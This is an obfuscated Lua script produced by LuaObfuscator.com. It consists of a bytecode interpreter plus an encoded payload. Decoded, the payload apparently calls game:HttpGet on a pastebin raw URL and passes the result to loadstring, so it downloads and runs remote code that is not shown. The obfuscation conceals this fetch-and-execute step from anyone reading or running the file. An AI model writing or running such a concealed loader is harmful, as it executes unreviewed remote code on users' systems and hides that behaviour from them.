--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v79=v2(v0(v30,16));if v19 then local v89=0;local v90;while true do if (v89==1) then return v90;end if (v89==0) then v90=v5(v79,v19);v19=nil;v89=1;end end else return v79;end end end);local function v20(v31,v32,v33) if v33 then local v80=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-1)) + (620 -(555 + (941 -(282 + 595)))))) ;return v80-(v80%(932 -(857 + 74))) ;else local v81=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v81 + v81))>=v81) and (1 + (1637 -(1523 + 114)))) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (2 -0) );v18=v18 + 2 ;return (v36 * (231 + 25)) + v35 ;end local function v23() local v37=1270 -((576 -(87 + 263)) + 1044) ;local v38;local v39;local v40;local v41;while true do if (v37==(0 -0)) then v38,v39,v40,v41=v1(v16,v18,v18 + (120 -(32 + 85)) );v18=v18 + 4 + 0 ;v37=1 + 0 ;end if (v37==(958 -((1072 -(67 + 113)) + 65))) then return (v41 * (40022563 -23245347)) + (v40 * (121138 -55602)) + (v39 * (469 -(157 + 56))) + v38 ;end end end local function v24() local v42=v23();local v43=v23();local v44=(2 + 0) -1 ;local v45=(v20(v43,1 + 0 ,79 -59 ) * ((954 -((2927 -2125) + 150))^(85 -53))) + v42 ;local v46=v20(v43,21,31);local v47=((v20(v43,474 -((1477 -1061) + 26) )==(3 -2)) and  -(1 + 0)) or (1 -0) ;if (v46==(0 + 0)) then if (v45==(997 -((1774 -(814 + 45)) + 82))) then return v47 * (0 -0) ;else local v91=(0 -0) + 0 ;while true do if (v91==((0 + 0) -0)) then v46=1188 -(1069 + 42 + 76) ;v44=0;break;end end end elseif (v46==(1677 + 370)) then return ((v45==(0 -0)) and (v47 * ((1 -0)/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(1817 -794) ) * (v44 + (v45/((2 + 0)^52))) ;end local function v25(v48) local v49=0;local v50;local v51;while true do if (v49==(888 -(261 + 624))) then return v6(v51);end if (v49==((7 -4) -1)) then v51={};for v92=1081 -(1020 + 60) , #v50 do v51[v92]=v2(v1(v3(v50,v92,v92)));end v49=3;end if (v49==(1424 -(630 + 793))) then v50=v3(v16,v18,(v18 + v48) -(3 -2) );v18=v18 + v48 ;v49=9 -7 ;end if (v49==0) then v50=nil;if  not v48 then local v103=(766 -(745 + 21)) + 0 ;while true do if (v103==(0 -(0 -0))) then v48=v23();if (v48==((15 + 1732) -(760 + 987))) then return "";end break;end end end v49=1914 -(616 + 1173 + 124) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do if (v52== #" ") then local v85=(function() return 1926 -(1235 + 691) ;end)();local v86=(function() return;end)();while true do if (v85==0) then v86=(function() return 0;end)();while true do if (v86==2) then v52=(function() return 2;end)();break;end if (v86~=(1836 -(274 + 1561))) then else for v133= #"!",v57 do local v134=(function() return 0 -0 ;end)();local v135=(function() return;end)();local v136=(function() return;end)();local v137=(function() return;end)();while true do if (v134~=(1 + 0)) then else v137=(function() return nil;end)();while true do if (v135~=0) then else local v169=(function() return 0;end)();local v170=(function() return;end)();while true do if (v169~=(241 -(187 + 54))) then else v170=(function() return 0;end)();while true do if (v170==(780 -(162 + 618))) then v136=(function() return v21();end)();v137=(function() return nil;end)();v170=(function() return 1;end)();end if (v170==(1 + 0)) then v135=(function() return  #":";end)();break;end end break;end end end if (v135~= #"<") then else if (v136== #":") then v137=(function() return v21()~=(0 + 0) ;end)();elseif (v136==(3 -1)) then v137=(function() return v24();end)();elseif (v136== #"19(") then v137=(function() return v25();end)();end v58[v133]=(function() return v137;end)();break;end end break;end if (v134==(0 -0)) then v135=(function() return 0;end)();v136=(function() return nil;end)();v134=(function() return 1 + 0 ;end)();end end end v56[ #"91("]=(function() return v21();end)();v86=(function() return 2;end)();end if (v86==(1636 -(1373 + 263))) then v57=(function() return v23();end)();v58=(function() return {};end)();v86=(function() return 1001 -(451 + 549) ;end)();end end break;end end end if (v52~=(1 + 1)) then else for v94= #"{",v23() do local v95=(function() return 0 -0 ;end)();local v96=(function() return;end)();while true do if (v95~=0) then else v96=(function() return v21();end)();if (v20(v96, #"{", #",")==(0 -0)) then local v126=(function() return 1384 -(746 + 638) ;end)();local v127=(function() return;end)();local v128=(function() return;end)();local v129=(function() return;end)();while true do if (2==v126) then if (v20(v128, #"}", #"|")== #":") then v129[2]=(function() return v58[v129[2]];end)();end if (v20(v128,1 + 1 ,2 -0 )~= #" ") then else v129[ #"xnx"]=(function() return v58[v129[ #"91("]];end)();end v126=(function() return 344 -(218 + 123) ;end)();end if (v126==(1582 -(1535 + 46))) then local v158=(function() return 0;end)();while true do if (v158==0) then v129=(function() return {v22(),v22(),nil,nil};end)();if (v127==0) then local v172=(function() return 0;end)();while true do if ((0 + 0)==v172) then v129[ #"nil"]=(function() return v22();end)();v129[ #"asd1"]=(function() return v22();end)();break;end end elseif (v127== #"~") then v129[ #"19("]=(function() return v23();end)();elseif (v127==(1 + 1)) then v129[ #"asd"]=(function() return v23() -((562 -(306 + 254))^16) ;end)();elseif (v127== #"asd") then local v177=(function() return 0;end)();local v178=(function() return;end)();while true do if (v177==(0 + 0)) then v178=(function() return 0 -0 ;end)();while true do if (v178==0) then v129[ #"19("]=(function() return v23() -((1469 -(899 + 568))^(11 + 5)) ;end)();v129[ #"http"]=(function() return v22();end)();break;end end break;end end end v158=(function() return 2 -1 ;end)();end if (v158==(604 -(268 + 335))) then v126=(function() return 2;end)();break;end end end if (v126==3) then if (v20(v128, #"91(", #"19(")== #"/") then v129[ #"0313"]=(function() return v58[v129[ #"xnxx"]];end)();end v53[v94]=(function() return v129;end)();break;end if (v126~=0) then else local v160=(function() return 290 -(60 + 230) ;end)();local v161=(function() return;end)();while true do if (v160==0) then v161=(function() return 572 -(426 + 146) ;end)();while true do if (v161~=(1 + 0)) then else v126=(function() return 1;end)();break;end if (v161==0) then v127=(function() return v20(v96,1458 -(282 + 1174) , #"nil");end)();v128=(function() return v20(v96, #"0313",817 -(569 + 242) );end)();v161=(function() return 2 -1 ;end)();end end break;end end end end end break;end end end for v97= #"\\",v23() do v54[v97-#"\\" ]=(function() return v28();end)();end return v56;end if (v52==(0 + 0)) then local v87=(function() return 1024 -(706 + 318) ;end)();local v88=(function() return;end)();while true do if (v87==(1251 -(721 + 530))) then v88=(function() return 1271 -(945 + 326) ;end)();while true do if (v88~=(2 -1)) then else v55=(function() return {};end)();v56=(function() return {v53,v54,nil,v55};end)();v88=(function() return 2;end)();end if (v88==(700 -(271 + 429))) then v53=(function() return {};end)();v54=(function() return {};end)();v88=(function() return 1 + 0 ;end)();end if (2==v88) then v52=(function() return  #".";end)();break;end end break;end end end end end local function v29(v59,v60,v61) local v62=v59[1501 -(1408 + 92) ];local v63=v59[1088 -(461 + 625) ];local v64=v59[1291 -(993 + 295) ];return function(...) local v65=v62;local v66=v63;local v67=v64;local v68=v27;local v69=1 + 0 ;local v70= -(1172 -(418 + 753));local v71={};local v72={...};local v73=v12("#",...) -(1122 -(118 + 1003)) ;local v74={};local v75={};for v82=0,v73 do if ((2995>1541) and (v82>=v67)) then v71[v82-v67 ]=v72[v82 + 1 + 0 ];else v75[v82]=v72[v82 + 1 + 0 ];end end local v76=(v73-v67) + 1 ;local v77;local v78;while true do v77=v65[v69];v78=v77[1 + 0 ];if (v78<=(532 -(406 + 123))) then if ((3249>953) and (v78<=(1770 -(1749 + 20)))) then if (v78>(0 -0)) then v75[v77[1 + (378 -(142 + 235)) ]]=v77[1325 -(1249 + 73) ];else v75[v77[1 + 1 ]]();end elseif ((v78>((5203 -4056) -(466 + 679))) or (3273>4573)) then local v106=v77[4 -2 ];local v107=v75[v77[(2 + 6) -5 ]];v75[v106 + (1901 -(106 + 1794)) ]=v107;v75[v106]=v107[v77[(979 -(553 + 424)) + 2 ]];else v75[v77[1 + (1 -0) ]]=v61[v77[8 -5 ]];end elseif (v78<=(13 -8)) then if (v78==(118 -(4 + 110))) then local v113=584 -(57 + 527) ;local v114;local v115;local v116;local v117;local v118;while true do if ((2996>=2654) and (v113==(1430 -(37 + 4 + 1386)))) then v77=v65[v69];v75[v77[2]]=v77[3 + 0 ];v69=v69 + ((61 + 43) -(17 + 37 + 49)) ;v77=v65[v69];v118=v77[2 + 0 ];v113=4;end if (v113==(3 -1)) then v118=v77[5 -(2 + 1) ];v117=v75[v77[169 -(122 + 44) ]];v75[v118 + (1 -0) ]=v117;v75[v118]=v117[v77[12 -8 ]];v69=v69 + 1 + 0 ;v113=1 + 2 ;end if (v113==(10 -5)) then v77=v65[v69];v118=v77[3 -1 ];v75[v118]=v75[v118](v13(v75,v118 + (66 -(30 + 35)) ,v70));v69=v69 + 1 + 0 ;v77=v65[v69];v113=1263 -(1043 + 214) ;end if (v113==(15 -11)) then v115,v116=v68(v75[v118](v13(v75,v118 + (1213 -(323 + 889)) ,v77[7 -4 ])));v70=(v116 + v118) -1 ;v114=580 -(361 + 219) ;for v162=v118,v70 do local v163=320 -((147 -94) + 267) ;while true do if (v163==0) then v114=v114 + 1 + 0 ;v75[v162]=v115[v114];break;end end end v69=v69 + 1 ;v113=418 -(15 + 398) ;end if (v113==0) then v114=nil;v115,v116=nil;v117=nil;v118=nil;v75[v77[984 -(18 + 964) ]]=v61[v77[11 -8 ]];v113=1 + 0 ;end if (v113==(4 + 2)) then v75[v77[(1907 -1055) -(20 + 830) ]]();v69=v69 + 1 + 0 ;v77=v65[v69];do return;end break;end if ((3978>2104) and (v113==(127 -(116 + 10)))) then v69=v69 + 1 ;v77=v65[v69];v75[v77[1 + 1 ]]=v61[v77[3]];v69=v69 + 1 ;v77=v65[v69];v113=740 -(158 + 384 + 196) ;end end else do return;end end elseif (v78>(12 -6)) then local v119=v77[1 + 1 ];local v120,v121=v68(v75[v119](v13(v75,v119 + 1 + (0 -0) ,v77[(755 -(239 + 514)) + 1 ])));v70=(v121 + v119) -(2 -1) ;local v122=(0 + 0) -0 ;for v130=v119,v70 do v122=v122 + 1 ;v75[v130]=v120[v122];end else local v123=1551 -(1126 + 425) ;local v124;while true do if (v123==(405 -(118 + 287))) then v124=v77[2];v75[v124]=v75[v124](v13(v75,v124 + (3 -2) ,v70));break;end end end v69=v69 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F557241616739436B00083O0012043O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
